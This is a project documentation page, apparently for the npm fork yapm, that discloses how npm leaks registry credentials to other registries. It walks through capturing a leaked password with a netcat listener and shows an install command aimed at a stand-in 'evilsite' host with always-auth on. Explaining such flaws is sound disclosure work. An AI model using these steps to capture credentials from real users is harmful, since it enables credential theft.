1 | Registry-specific configuraion: security fixes
|
2 | ----------------------------------------------
|
3 |
|
4 | `npm` has one configuration for all registries. If you're using different registries, `npm` can leak your credentials from one registry to another. Also, user can be tricked to expose his credentials with a crafted command-line string.
|
5 |
|
6 | `yapm` has separate configurations for each registry, which means this flaw doesn't exist anymore. See [here](multireg-conf.md) for details about how it's done.
|
7 |
|
8 | It means that if you authenticated to one registry, but request another one, it can expose sensitive information to that registry. It's extremely important if you use multiple registries administered by different people.
|
9 |
|
10 | Think about a browser that shares authentication info with all websites. If one website is storing a cookie, your browser will sent it with all requests. If you use just one website, this approach is good. But if you use several of them, this is a critical security flaw.
|
11 |
|
12 | ### This is how you can replicate this bug:
|
13 |
|
14 | Authenticate yourself in the main registry:
|
15 |
|
16 | ```
|
17 | $ npm adduser --registry http://registry.npmjs.org/
|
18 | ```
|
19 |
|
20 | Create and publish a new package:
|
21 |
|
22 | ```
|
23 | $ mkdir test ; cd test ; echo '{"name":"test","version":"0.0.0"}' > package.json
|
24 | $ npm publish --registry http://localhost:8080/
|
25 | ```
|
26 |
|
27 | Listen for all requests on some port in a separate terminal:
|
28 |
|
29 | ```
|
30 | $ nc -l 8080
|
31 | POST /_session HTTP/1.1
|
32 | host: localhost:8080
|
33 | accept: application/json
|
34 | content-type: application/json
|
35 | content-length: 40
|
36 | Connection: keep-alive
|
37 |
|
38 | {"name":"test","password":"test"}
|
39 | ```
|
40 |
|
41 | Do you see it? `npm` is leaking your password to another registry, even though you didn't write it explicitly.
|
42 |
|
43 | ### always-auth issues
|
44 |
|
45 | It is getting even worse with `always-auth` setting on.
|
46 |
|
47 | ```
|
48 | $ npm install foobar --reg http://evilsite.example.com/ --always-auth=true
|
49 | ```
|
50 |
|